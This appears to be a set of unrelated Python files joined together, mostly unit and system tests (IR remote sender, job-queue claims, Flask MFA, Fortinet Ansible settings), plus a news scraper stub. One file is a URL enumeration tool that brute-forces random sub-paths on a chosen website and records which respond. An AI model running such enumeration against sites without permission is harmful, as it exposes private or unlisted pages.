assert not result.exit_code
assert (
textwrap.dedent(
"""
└── Name: flow-run-name
└── UUID: flow-run-id
└── Labels: ['label']
└── Parameters: {'param': 'value'}
└── Context: {'foo': 'bar'}
└── URL: fake-url
"""
)
in result.output
)
|
import os
import unittest
import yaml
from remote_controller.ir_sender import IRSender
FILE_PATH = os.path.dirname(__file__)
ACTIONS_PATH = '../resources/commands/commands-actions.yml'
class IRSenderTest(unittest.TestCase):
def setUp(self):
with open(os.path.join(FILE_PATH, ACTIONS_PATH), 'r') as stream:
try:
                actions = yaml.safe_load(stream)
except yaml.YAMLError as exception:
actions = None
print(exception)
self.__device = 'lg'
self.__ir_sender = IRSender(self.__device, actions, True)
def test_send_raw_power_command(self):
command = 'KEY_POWER'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_power_command(self):
command = 'POWER'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_POWER')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_ok_command(self):
command = 'KEY_OK'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_ok_command(self):
command = 'OK'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_OK')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_list_command(self):
command = 'KEY_LIST'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_list_command(self):
command = 'LIST'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_LIST')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_undo_command(self):
command = 'KEY_UNDO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_undo_command(self):
command = 'UNDO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_UNDO')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_back_command(self):
command = 'KEY_BACK'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_back_command(self):
command = 'BACK'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_BACK')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_info_command(self):
command = 'KEY_INFO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_info_command(self):
command = 'INFO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_INFO')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_exit_command(self):
command = 'KEY_EXIT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_exit_command(self):
command = 'EXIT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_EXIT')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_menu_command(self):
command = 'KEY_MENU'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_menu_command(self):
command = 'MENU'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_MENU')]
result = self.__ir_sender.send(command, None)
        self.assertEqual(expected, result)
def test_send_raw_mute_command(self):
command = 'KEY_MUTE'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
        self.assertEqual(expected, result)
def test_send_mute_command(self):
command = 'MUTE'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_MUTE')]
result = self.__ir_sender.send(command, None)
        self.assertEqual(expected, result)
def test_send_raw_config_command(self):
command = 'KEY_CONFIG'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
        self.assertEqual(expected, result)
def test_send_config_command(self):
command = 'SETTINGS'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CONFIG')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_video_command(self):
command = 'KEY_VIDEO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_input_command(self):
command = 'INPUT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VIDEO')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_screen_command(self):
command = 'KEY_SCREEN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_screen_command(self):
command = 'SCREEN_RATIO'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_SCREEN')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_volume_up_command(self):
command = 'KEY_VOLUMEUP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_volume_up_command(self):
command = 'VOLUME_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEUP')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_volume_down_command(self):
command = 'KEY_VOLUMEDOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_volume_down_command(self):
command = 'VOLUME_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEDOWN')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_channel_up_command(self):
command = 'KEY_CHANNELUP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_channel_up_command(self):
command = 'CHANNEL_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELUP')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_channel_down_command(self):
command = 'KEY_CHANNELDOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_channel_down_command(self):
command = 'CHANNEL_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELDOWN')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_key_up_command(self):
command = 'KEY_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
        self.assertEqual(expected, result)
def test_send_key_up_command(self):
command = 'MOVE_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_UP')]
result = self.__ir_sender.send(command, None)
        self.assertEqual(expected, result)
def test_send_raw_key_down_command(self):
command = 'KEY_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_key_down_command(self):
command = 'MOVE_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_DOWN')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_key_right_command(self):
command = 'KEY_RIGHT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_key_right_command(self):
command = 'MOVE_RIGHT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_RIGHT')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_send_raw_key_left_command(self):
command = 'KEY_LEFT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, command)]
result = self.__ir_sender.send_raw(command)
self.assertEqual(expected, result)
def test_send_key_left_command(self):
command = 'MOVE_LEFT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_LEFT')]
result = self.__ir_sender.send(command, None)
self.assertEqual(expected, result)
def test_composite_channel_up_command(self):
command = 'CHANNEL_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELUP'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELUP'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELUP')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
def test_composite_channel_down_command(self):
command = 'CHANNEL_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELDOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELDOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_CHANNELDOWN')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
def test_composite_volume_up_command(self):
command = 'VOLUME_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEUP'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEUP')]
result = self.__ir_sender.send(command, 2)
self.assertEqual(expected, result)
def test_composite_volume_down_command(self):
command = 'VOLUME_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEDOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEDOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_VOLUMEDOWN')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
# Move
def test_composite_move_up_command(self):
command = 'MOVE_UP'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_UP')]
result = self.__ir_sender.send(command, 1)
self.assertEqual(expected, result)
def test_composite_move_down_command(self):
command = 'MOVE_DOWN'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_DOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_DOWN'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_DOWN')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
def test_composite_move_left_command(self):
command = 'MOVE_LEFT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_LEFT'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_LEFT'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_LEFT')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
def test_composite_move_right_command(self):
command = 'MOVE_RIGHT'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_RIGHT'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_RIGHT'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_RIGHT')]
result = self.__ir_sender.send(command, 3)
self.assertEqual(expected, result)
def test_number_channel_345_command(self):
command = 'CHANNEL'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_3'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_4'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_5')]
result = self.__ir_sender.send(command, '345')
self.assertEqual(expected, result)
def test_number_channel_123_command(self):
command = 'CHANNEL'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_1'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_2'),
'irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_3')]
result = self.__ir_sender.send(command, '123')
self.assertEqual(expected, result)
def test_number_channel_8_command(self):
command = 'CHANNEL'
expected = ['irsend SEND_ONCE {} {}'.format(self.__device, 'KEY_8')]
result = self.__ir_sender.send(command, '8')
self.assertEqual(expected, result)
|
import pytest
import requests
from .utils import SECRET_KEY
from microq_admin.utils import load_config
from microq_admin.tools import delete_claims
from microq_admin.projectsgenerator.qsmrprojects import (
create_project, delete_project, is_project
)
from microq_admin.jobsgenerator.qsmrjobs import (
main as jobsmain,
)
CONFIG_FILE = '/tmp/test_qsmr_snapshot_config.conf'
JOBS_FILE = '/tmp/test_qsmr_snapshot_jobs.txt'
ODIN_PROJECT = 'myodinproject'
WORKER = 'claimtestsworker'
def make_config(odinurl, microqurl):
cfg = (
'JOB_API_ROOT={}/rest_api\n'.format(microqurl)
+ 'JOB_API_USERNAME=admin\n'
'JOB_API_PASSWORD=sqrrl\n'
'ODIN_API_ROOT={}\n'.format(odinurl)
+ f'ODIN_SECRET={SECRET_KEY}\n'
)
with open(CONFIG_FILE, 'w') as out:
out.write(cfg)
def make_projects(jobsproject, nojobsproject, config):
# No conflict with other tests
assert not is_project(jobsproject, config)
assert not is_project(nojobsproject, config)
# Make projects
assert not create_project(jobsproject, config)
assert not create_project(nojobsproject, config)
def make_jobs(jobsproject, number_of_jobs=6):
scanids = [str(v) for v in range(number_of_jobs)]
with open(JOBS_FILE, 'w') as out:
out.write('\n'.join(scanids) + '\n')
assert not jobsmain([
jobsproject, ODIN_PROJECT, '--freq-mode', '1', '--jobs-file',
JOBS_FILE,
], CONFIG_FILE)
def claim_jobs(jobsproject, config, number_of_jobs=3):
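    # Fetch the next available job from the API, then claim it for WORKER with a PUT to that job's claim endpoint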
claimurl = "{}/v4/{}/jobs/{}/claim".format(
config['JOB_API_ROOT'], jobsproject, "{}",
)
fetchurl = "{}/v4/{}/jobs/fetch".format(
config['JOB_API_ROOT'], jobsproject,
)
auth = (config['JOB_API_USERNAME'], config['JOB_API_PASSWORD'])
jobids = []
for _ in range(number_of_jobs):
response = requests.get(fetchurl, auth=auth)
response.raise_for_status()
jobid = response.json()['Job']['JobID']
response = requests.put(
claimurl.format(jobid), auth=auth, json={'Worker': WORKER},
)
response.raise_for_status()
jobids.append(jobid)
return jobids
def fail_job(jobsproject, failid, config):
url = "{}/v4/{}/jobs/{}/status".format(
config['JOB_API_ROOT'], jobsproject, failid,
)
auth = (config['JOB_API_USERNAME'], config['JOB_API_PASSWORD'])
response = requests.put(url, auth=auth, json={'Status': 'FAILED'})
response.raise_for_status()
@pytest.fixture(scope='function')
def delete_claim_projects(odin_and_microq):
make_config(*odin_and_microq)
config = load_config(CONFIG_FILE)
jobsproject = "claimsjobsproject"
nojobsproject = "claimsnojobsproject"
make_projects(jobsproject, nojobsproject, config)
make_jobs(jobsproject)
jobids = claim_jobs(jobsproject, config)
assert jobids
fail_job(jobsproject, jobids[0], config)
yield jobsproject, nojobsproject
# Cleanup
assert not delete_project(jobsproject, config)
assert not delete_project(nojobsproject, config)
def get_jobs_counts(project):
config = load_config(CONFIG_FILE)
url = "{}/v4/{}/jobs/count".format(config['JOB_API_ROOT'], project)
response = requests.get(url)
response.raise_for_status()
claimed = response.json()['Counts'][0]['JobsClaimed']
failed = response.json()['Counts'][0]['JobsFailed']
url = "{}/v4/{}/jobs?status=available".format(
config['JOB_API_ROOT'], project
)
response = requests.get(url)
response.raise_for_status()
available = len(response.json()['Jobs'])
return available, claimed, failed
@pytest.mark.system
def test_bad_project_name(delete_claim_projects):
assert (
delete_claims.main(['claimsbadproject'], config_file=CONFIG_FILE)
== "No project called claimsbadproject"
)
@pytest.mark.system
def test_empty_project(delete_claim_projects):
_, nojobsproject = delete_claim_projects
assert (
delete_claims.main([nojobsproject], config_file=CONFIG_FILE)
== "Project {} has no jobs".format(nojobsproject)
)
@pytest.mark.system
def test_make_failed_available(delete_claim_projects):
project, _ = delete_claim_projects
# Available, Claimed + Failed, Failed
# Total of six jobs
assert get_jobs_counts(project) == (3, 3, 1)
assert not delete_claims.main([project], config_file=CONFIG_FILE)
    # Available is only a status, so it's still 3 (claiming sets a status)
    # Deleting a claim does not change the status
    # The previously claimed failed job is no longer claimed but is still failed
# Total of 6 jobs
assert get_jobs_counts(project) == (3, 2, 1)
@pytest.mark.system
def test_make_non_finished_available(delete_claim_projects):
project, _ = delete_claim_projects
# Available, Claimed + Failed, Failed
# Total of six jobs
assert get_jobs_counts(project) == (3, 3, 1)
assert not delete_claims.main(
[project, '--force'], config_file=CONFIG_FILE,
)
    # Available is only a status, so it's still 3 (claiming sets a status)
    # Deleting a claim does not change the status
    # The previously claimed jobs (failed or not) are no longer claimed
    # The failed job still has that status
# Total of six jobs
assert get_jobs_counts(project) == (3, 0, 1)
|
import pyotp
from flask import url_for
from itsdangerous import Signer
from app.config import FLASK_SECRET
from app.extensions import db
from app.models import User
def test_auth_mfa_success(flask_client):
user = User.create(
email="a@b.c",
password="password",
name="Test User",
activated=True,
enable_otp=True,
otp_secret="base32secret3232",
)
db.session.commit()
totp = pyotp.TOTP(user.otp_secret)
s = Signer(FLASK_SECRET)
mfa_key = s.sign(str(user.id))
r = flask_client.post(
url_for("api.auth_mfa"),
json={"mfa_token": totp.now(), "mfa_key": mfa_key, "device": "Test Device"},
)
assert r.status_code == 200
assert r.json["api_key"]
assert r.json["email"]
assert r.json["name"] == "Test User"
def test_auth_wrong_mfa_key(flask_client):
user = User.create(
email="a@b.c",
password="password",
name="Test User",
activated=True,
enable_otp=True,
otp_secret="base32secret3232",
)
db.session.commit()
totp = pyotp.TOTP(user.otp_secret)
r = flask_client.post(
url_for("api.auth_mfa"),
json={
"mfa_token": totp.now(),
"mfa_key": "wrong mfa key",
"device": "Test Device",
},
)
assert r.status_code == 400
assert r.json["error"]
|
import string
import random
import urllib.request
import requests
import timeit
def script():
start = timeit.default_timer()
print("Welcome to ")
print("""\
▓█████ ███▄ █ ██████ ▄▄▄█████▓ ██▒ █▓ ▄▄▄
▓█ ▀ ██ ▀█ █ ▒ ██ ▒ ▓ ██▒ ▓▒ ▓██░ █▒▒ ████▄
▒███ ▓ ██ ▀█ ██▒░ ▓██▄ ▒ ▓██░ ▒░ ▓██ █▒░▒ ██ ▀█▄
▒▓█ ▄▓ ██▒ ▐▌██▒ ▒ ██▒ ░ ▓██▓ ░ ▒██ █░░░ ██▄▄▄▄██
░▒████▒ ██░ ▓██░▒█ █████▒▒ ▒██▒ ░ ▒▀█░ ▓█ ▓██▒
░░ ▒░ ░ ▒░ ▒ ▒ ▒ ▒▓▒ ▒ ░ ▒ ░░ ░ ▐░ ▒▒ ▓▒█░
░ ░ ░ ░░ ░ ▒░░ ░▒ ░ ░ ░ ░ ░░ ▒ ▒▒ ░
░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ▒
░ ░ ░ ░ ░ ░ ░
""")
print("----------------------------------------------------------")
print("Note: This tool can only be used to enumerate websites with alphanumeric sub-pathes.\n Eg:www.abc.com/sd4g5\n\twww.bcd.com/ui8")
print("----------------------------------------------------------")
    a = input("Enter URL with / and scheme included \n\t\te.g.: https://www.abcd.com/ : ").strip()
n=int(input("Enter Limit of Enumeration : "))
k=int(input("Enter length of sub path : "))
print("----------------------------------------------------------")
fi=open('link.txt','a+')
for i in range(n):
f=''.join(random.choices(string.ascii_lowercase +
string.digits, k=k))
fi.write(a+f+"\n")
fi.close()
open('output.txt','a').writelines(set(open('link.txt','r').readlines()))
open('link.txt', 'w').close()
print("Output saved : output.txt")
def url_check(urls):
for url in urls:
try:
resp = requests.get(url)
if resp.status_code == 200:
redirect=len(resp.history)
print("----------------------------------------------------------")
print(f"Redirection count : {redirect}")
print("URL : ",url)
if redirect==0:
fin.write(url+"\n")
res = urllib.request.urlopen(url)
finalurl = res.geturl()
print("Final URL : ",finalurl)
for resp in resp.history:
print(resp.status_code, resp.url)
print("----------------------------------------------------------")
print("\n")
else:
print(f"{url} is Not Valid")
            except Exception as exc:
                raise Exception(f"{url} is down!\n Program Stopped!") from exc
f2=open("output.txt","r")
urls=list(f2.readlines())
for index, item in enumerate(urls):
item = item.strip(string.punctuation).strip()
if "http" not in item:
item = "http://" + item
urls[index] = item
print("----------------------------------------------------------")
print("_________________________URL List_________________________ \n",urls)
try:
fin=open("final.txt","a+")
url_check(urls)
fin.close()
f2.close()
open('output.txt', 'w').close()
print("----------------------------------------------------------")
print("Process completed, Final Result : final.txt")
stop = timeit.default_timer()
execution_time = stop - start
print(f"Program Executed in {str(execution_time)} seconds") # It returns time in seconds
print("----------------------------------------------------------")
except Exception as e:
print(e)
script()
# To run the script x number of times, comment out the previous line and use (note: this also needs `import time`):
# for i in range(x):
# script()
# time.sleep(5)
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_endpoint_control_settings
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_endpoint_control_settings.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
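# Module-level handler shared by the tests below; its set/schema methods are patched in every test, so the mocked connection is never exercised directly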
def test_endpoint_control_settings_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_endpoint_control_settings_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_endpoint_control_settings_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_endpoint_control_settings_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'random_attribute_not_valid': 'tag',
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
|
# Build a dictionary with the following keys = lista (list), somatorio (sum), tamanho (length), maior valor (largest value), menor valor (smallest value)
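# A minimal sketch of one possible solution; the sample list below is only an
# illustrative assumption, any list of numbers would do.
numeros = [7, 2, 9, 4]
resultado = {
    "lista": numeros,               # the list itself
    "somatorio": sum(numeros),      # sum of the values
    "tamanho": len(numeros),        # number of elements
    "maior valor": max(numeros),    # largest value
    "menor valor": min(numeros),    # smallest value
}
print(resultado)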
|
from website_manager import WebsiteManager
class NewsManager:
def __init__(self):
self.website_manager = WebsiteManager()
self.titles = []
# Find the titles of several news websites
def find_titles(self, urls):
titles = []
for url in urls:
articles_titles = self.website_manager.get_articles_titles(url)
titles.extend(articles_titles)
self.titles = titles
# Print the local self.titles array members
def print_titles(self):
print("The titles found are:")
print("---------------------")
for title in self.titles:
print(title)
print("----------------------")
|
import os
import time
from pathlib import Path
from typing import List, Dict
import cv2
import numpy as np
from decord import VideoReader
from decord import cpu
from appearance_module.base import AppearanceModel
